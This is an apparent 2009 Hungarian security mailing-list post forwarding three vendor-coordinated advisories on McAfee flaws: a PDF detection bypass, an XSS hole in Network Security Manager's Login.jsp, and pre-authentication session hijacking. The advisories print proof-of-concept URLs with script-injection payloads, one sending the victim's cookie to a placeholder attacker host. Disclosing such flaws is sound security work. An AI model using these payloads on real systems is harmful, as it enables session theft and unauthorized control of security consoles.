[guru] McAfee biztonsagi frissitesek
DATE: Tue, 24 Nov 2009 01:45:41 +0100
A McAfee termékek nem megfelelően ellenőrzik a PDF állományokat, a támadó
már ismert módszereket is használhat, amit az antivirus nem fog megtalálni.
XSS hibát találtak az McAfee Network Security Manager termékben, a Login.jsp
nem szűri megfelelően az iaction és node paraméterek tartalmát.
Szintén a Network Security Manager hibája, hogy a session cookie már az
azonosítás előtt beállítódik, így az egész azonosítás kikerülhető.
--- Begin Message ---
________________________________________________________________________
McAfee multiple products - Generic PDF detection bypass
________________________________________________________________________
***********************************************************************
Cheap plug :
If you are interested in client side vulnerabilities visit HACK.LU
starting tomorrow 28-30 Oct with :
Workshop:
* Bypassing the Perimeter: Client Side Exploitation - Nitesh Dhanjani,
Billy K Rios
Talks :
* New advances in Office Malware analysis - Frank Boldewin
* PDF Penetration Document Format - Didier Stevens
* Ownage 2.0 - Saumil Shah (who else)
* Malicious PDF origamis strike back - Guillaume Delugré
Frederic Raynal
***********************************************************************
Release mode : Coordinated
Reference : [GSEC-05-2009] - MCafee generic PDF bypass
WWW : http://www.g-sec.lu/mcafee-pdf-bypass.html
Vendor : http://www.mcafee.com
Status : Patched
CVE : none attributed yet
Credit : https://kc.mcafee.com/corporate/index?page=content&id=SB10003
(We disagree with the CVSS rating )
Discovered by : Thierry Zoller (G-SEC)
Affected products :
~~~~~~~~~~~~~~~~~~~
All McAfee software that uses DATs including:
- McAfee GroupShield
- McAfee LinuxShield
- McAfee NetShield for NetWare
- McAfee PortalShield
- McAfee Total Protection Service (SaaS)
- McAfee Virex
- McAfee Total Protection™ 2009
- McAfee Internet Security
- McAfee VirusScan USB
- McAfee VirusScan Enterprise
- McAfee VirusScan Enterprise Linux
- McAfee VirusScan Enterprise for SAP
- McAfee VirusScan Enterprise for Storage
- McAfee VirusScan Commandline
- Mcafee SecurityShield for Microsoft ISA Server
- Mcafee Security for Microsoft Sharepoint
- Mcafee Security for Email Servers
- McAfee Email Gateyway
- McAfee Total Protection for Endpoint
- McAfee Active Virus Defense
- McAfee Active VirusScan
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches dsitributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "McAfee proactively secures systems and networks from known
and as yet undiscovered threats worldwide. Home users, businesses,
service providers, government agencies, and our partners all trust
our unmatched security expertise and have confidence in our
comprehensive and proven solutions to effectively block attacks
and prevent disruptions."
II. Description
~~~~~~~~~~~~~~~
Improper parsing of the PDF structure leads to evasion of detection of
malicious PDF documents at scantime and runtime.
This has been tested with several malicious PDF files and represents
a generic evasion of all PDF signatures and heuristics.
General information about evasion/bypasses can be found at :
http://blog.zoller.lu/2009/04/case-for-av-bypassesevasions.html
III. Impact
~~~~~~~~~~~
Known PDF exploits/malware may evade signature detection, 0day exploits
may evade heuristics.
IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~~~
DD.MM.YYYY
01.06.2009 - Reported
20.10.2009 - McAfee informed us that they published the advisory on their website
< waiting for others vendors to patch >
27.10.2009 - G-SEC releases this advisory
About G-SEC
~~~~~~~~~~~
G-SEC™ is a vendor independent luxemburgish led IT security consulting
group. More information available at : http://www.g-sec.lu/
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
SecureWorks Security Advisory SWRX-2009-001
McAfee Network Security Manager Cross-Site Scripting (XSS) Vulnerability
Advisory Information
Title: McAfee Network Security Manager Cross-Site Scripting (XSS) Vulnerability
Advisory ID: SWRX-2009-001
Advisory URL: http://www.secureworks.com/ctu/advisories/SWRX-2009-001
Date published: Wednesday, November 11, 2009
CVE: CVE-2009-3565
CVSS v2 Base Score: 4.3 (Medium) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Date of last update: Wednesday, November 11, 2009
Vendors contacted: McAfee, Inc.
Release mode: Coordinated release
Discovered by: Daniel King, SecureWorks
Summary
McAfee Network Security Manager is vulnerable to cross-site scripting (XSS) caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using vulnerable parameters in a specially-crafted URL to execute script in a victim?s web browser within the security context of the Network Security Manager site.
Affected Products
McAfee Network Security Manager (NSM), version 5.1.7.7 (default configuration).
It is unknown which other versions, if any, are affected as of November 11, 2009.
Vendor Information, Solutions and Workarounds
McAfee has provided a new release to address this security flaw. Upgrade NSM software to NSM 5.1.11.6 or above, available for McAfee NSM clients at:
https://secure.nai.com/apps/downloads/my_products/login.asp
More information is available from McAfee at:
McAfee Security Bulletin SB10004
Intrushield NSM update fixes XSS flaw
https://kc.mcafee.com/corporate/index?page=content&id=SB10004
Follow best practices of placing the security management console on a segregated management network. Apply restrictive, default-deny firewall policies to protect these assets from access by unauthorized users.
Do not perform administrative access of security management consoles from computers exposed to the Internet through web browsing, email, and other applications. Lock down and heavily monitor systems used to perform administrative tasks such as accessing security management consoles.
Details
User-controllable input supplied by the ?iaction? and ?node? parameters to the ?Login.jsp? page is not properly sanitized for invalid or malicious content prior to being returned to the user in dynamically generated web content. This condition may aid an attacker in retrieving session cookies, stealing recently submitted data, or launching further attacks.
SecureWorks Risk Scoring
Likelihood: 2 ? Best practice is to deploy the management console web application on a segmented management network.
Impact: 5 ? Control over security appliances managed by the management console.
CVSS Severity (version 2.0)
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Confidentiality Impact: None
Integrity Impact: Partial
Availability Impact: None
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS v2 Base Score: 4.3 (Medium) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Proof of Concept
The following example URLs demonstrate user-controllable JavaScript being executed in the context of the McAfee Network Security Manager website.
https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14";><script>alert('XSS')</script>8b3283a1e57
https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=8502a";><script>alert(1)</script>2aa99b60533&iaction=precreatefcb14"><script>alert(?XSS?)</script>8b3283a1e57
Revision History
1.0 November 11, 2009 ? Initial advisory release
PGP Keys
This advisory has been signed with the PGP key of the SecureWorks Counter Threat Unit(SM), which is available for download at http://www.secureworks.com/contact/SecureWorksCTU.asc.
About the SecureWorks Counter Threat Unit(SM)
Our expert team of threat researchers, also known as the SecureWorks Counter Threat Unit(SM), identifies and analyzes emerging threats and develops countermeasures, correlations and SOC processes to protect clients' critical information assets. The CTU frequently serves as an expert resource for the media, publishes technical analyses for the security community and speaks about emerging threats at security conferences. Leveraging our security technologies and a network of industry contacts, the CTU tracks leading hackers and analyzes anomalous activity, uncovering new attack techniques and threats. This process enables the CTU to identify threats as they emerge and develop countermeasures that protect our clients before damage occurs.
About SecureWorks
With over 2000 clients, SecureWorks has become one of the leading Security as a Service providers safeguarding more organizations 24x7 than any other vendor. SecureWorks focuses exclusively on information security services and was recently positioned in the Leader's Quadrant in Gartner's Magic Quadrant for Managed Security Services Providers (MSSPs). SecureWorks Security Information and Event Management (SIEM) platform augmented with applied security research and 100% GIAC-certified experts protects clients with our award-winning Managed Security Services and SIM On-Demand solution.
Disclaimer
Copyright © 2009 SecureWorks, Inc.
This advisory may not be edited or modified in any way without the express written consent of SecureWorks, Inc. If you wish to reprint this advisory or any portion or element thereof, please contact ctu@secureworks.com to seek permission. Permission is hereby granted to link to this advisory via the SecureWorks website at http://www.secureworks.com/ctu/advisories/SWRX-2009-001 or use in accordance with the fair use doctrine of U.S. copyright laws.
The information within this advisory may change without notice. The most recent version of this advisory may be found on the SecureWorks web site at www.secureworks.com for a limited period of time. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. ANY USE OF THIS INFORMATION IS AT THE USER'S RISK. In no event shall SecureWorks be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - WinPT 1.2.0
iQEcBAEBCAAGBQJK+y93AAoJEK0ZvYFWLue8iW4IAIUmyTg0ehNwpYVlBbH3+P3T
kzUN4ENDQhgh0JNvd7f7jqtOmhX6Lnacnd4V9WKsCsg2DfW4KgKGre+Wx4qRYIwP
58nrN9Gk3G/Al0xPUvOe/dAlTbpOeVykxEfVkqA4xbUu2/KprAZ8aBP/6W9p62GB
DYCZ4xf72dfLnDZtuWRwDGDfp1vMhba9MVPm0b2BcBq9+efT5RPaarMSWriaKEla
iNexoajuguN9zes/kfFC15YmC40MCwlIvYlbZ38b8f2JwLvzHhVVMuGZ2hvFhCMa
ZHjStWZ7Ac3OigJOkV+ZIDriWQiHyfpFs+rSXzZX6p/WjB3aOgocVRUB4gNcV6s=
=xV/4
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
SecureWorks Security Advisory SWRX-2009-002
McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
Advisory Information
Title: McAfee Network Security Manager Authentication Bypass and Session Hijacking Vulnerability
Advisory ID: SWRX-2009-002
Advisory URL: http://www.secureworks.com/ctu/advisories/SWRX-2009-002
Date published: Wednesday, November 11, 2009
CVE: CVE-2009-3566
CVSS v2 Base Score: 4.3 (Medium) (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Date of last update: Wednesday, November 11, 2009
Vendors contacted: McAfee, Inc.
Release mode: Coordinated release
Discovered by: Daniel King, SecureWorks
Summary
McAfee Network Security Manager is vulnerable to authentication bypass via HTTP session cookie hijacking. A remote attacker could exploit this vulnerability to hijack an existing session to the Network Security Manager.
Affected Products
McAfee Network Security Manager (NSM), version 5.1.7.7 (default configuration).
It is unknown which other versions, if any, are affected as of November 11, 2009.
Vendor Information, Solutions and Workarounds
McAfee has provided a new release to address this security flaw. Upgrade NSM software to NSM 5.1.11.8.1 or above, available for McAfee NSM clients at:
https://secure.nai.com/apps/downloads/my_products/login.asp
More information is available from McAfee at:
McAfee Security Bulletin SB10005
Intrushield NSM update fixes Session Hijacking flaw
https://kc.mcafee.com/corporate/index?page=content&id=SB10005
Follow best practices of placing the security management console on a segregated management network. Apply restrictive, default-deny firewall policies to protect these assets from access by unauthorized users.
Do not perform administrative access of security management consoles from computers exposed to the Internet through web browsing, email, and other applications. Lock down and heavily monitor systems used to perform administrative tasks such as accessing security management consoles.
Details
When a user loads the login page of the Network Security Manager, the server sets a cookie within the browser before authentication occurs. This cookie is accessible from client-side JavaScript because the ?HttpOnly? flag is not set. An attacker with access to this cookie may gain privileged access to the Network Security Manager without the need to authenticate.
SecureWorks Risk Scoring
Likelihood: 2 ? Best practice is to deploy the management console web application on a segmented management network.
Impact: 5 ? Control over security appliances managed by the management console.
CVSS Severity (version 2.0)
Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type: Allows unauthorized modification
Confidentiality Impact: Partial
Integrity Impact: None
Availability Impact: None
Impact Subscore: 2.9
Exploitability Subscore: 8.6
CVSS v2 Base Score: 4.3 (Medium) (AV:N/AC:M/Au:N/C:P/I:N/A:N)
Proof of Concept
The following demonstrates theft of the session identifier. A cross-site scripting vulnerability is leveraged to steal the cookie data.
Example URL used in cookie theft:
https://x.x.x.x/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb14%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57
Because the ?HttpOnly? flag is not set on the cookie, the cookie data is available from client-side JavaScript. The URL above injects a JavaScript image object within an XSS attack. The src method is then invoked on the Image object, and the URL passed to the object contains a URI-encoded version of the cookie data.
This will cause the victim?s browser to connect to the URL and attempt to fetch this image. Since the image does not exist, nothing will display on the victim?s browser. The attacker?s web server access logs will contain the victim?s cookie data, including the session identifier.
Using the victim?s session identifier, the attacker can send a specially-crafted HTTP request to the server that will result in an authentication bypass.
Revision History
1.0 November 11, 2009 ? Initial advisory release
PGP Keys
This advisory has been signed with the PGP key of the SecureWorks Counter Threat Unit(SM), which is available for download at http://www.secureworks.com/contact/SecureWorksCTU.asc.
About the SecureWorks Counter Threat Unit(SM)
Our expert team of threat researchers, also known as the SecureWorks Counter Threat Unit(SM), identifies and analyzes emerging threats and develops countermeasures, correlations and SOC processes to protect clients' critical information assets. The CTU frequently serves as an expert resource for the media, publishes technical analyses for the security community and speaks about emerging threats at security conferences. Leveraging our security technologies and a network of industry contacts, the CTU tracks leading hackers and analyzes anomalous activity, uncovering new attack techniques and threats. This process enables the CTU to identify threats as they emerge and develop countermeasures that protect our clients before damage occurs.
About SecureWorks
With over 2000 clients, SecureWorks has become one of the leading Security as a Service providers safeguarding more organizations 24x7 than any other vendor. SecureWorks focuses exclusively on information security services and was recently positioned in the Leader's Quadrant in Gartner's Magic Quadrant for Managed Security Services Providers (MSSPs). SecureWorks Security Information and Event Management (SIEM) platform augmented with applied security research and 100% GIAC-certified experts protects clients with our award-winning Managed Security Services and SIM On-Demand solution.
Disclaimer
Copyright © 2009 SecureWorks, Inc.
This advisory may not be edited or modified in any way without the express written consent of SecureWorks, Inc. If you wish to reprint this advisory or any portion or element thereof, please contact ctu@secureworks.com to seek permission. Permission is hereby granted to link to this advisory via the SecureWorks website at http://www.secureworks.com/ctu/advisories/SWRX-2009-002 or use in accordance with the fair use doctrine of U.S. copyright laws.
The information within this advisory may change without notice. The most recent version of this advisory may be found on the SecureWorks web site at www.secureworks.com for a limited period of time. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. ANY USE OF THIS INFORMATION IS AT THE USER'S RISK. In no event shall SecureWorks be liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32) - WinPT 1.2.0
iQEcBAEBCAAGBQJK+zBmAAoJEK0ZvYFWLue85jsH/jSSYMdfGaBY5haEsaa8j5LJ
Ox7C7qzdh5wnLrxhULje+7lgJAW+V4zRZk5Iy2F0PVjGfd3V4N2bP6MJYCwcgwua
UxeAjtK8YTpclEDFxsVdNf+oYVK3sfjTBuRMCCn+HUy97F1OGgGEknncxKqe0K5Z
KQGxEEg3vnINogZ0HR1QrG8Swj4ZmEmAoG9yDBxmkphTMmDcIJQ+rIzrqHqEMmdJ
yFwhdId7pgACLab0U4sS2bYGzbQI/t1fU9G+uhE4k64XNwmrYfniUa6rBi1Lj2AD
5qGN4543XNkOHhzfeDbdV3jIIv9SBZ4GdW4NledRPJONZHIztz8Rta6udubVxi4=
=vtXj
-----END PGP SIGNATURE-----
--- End Message ---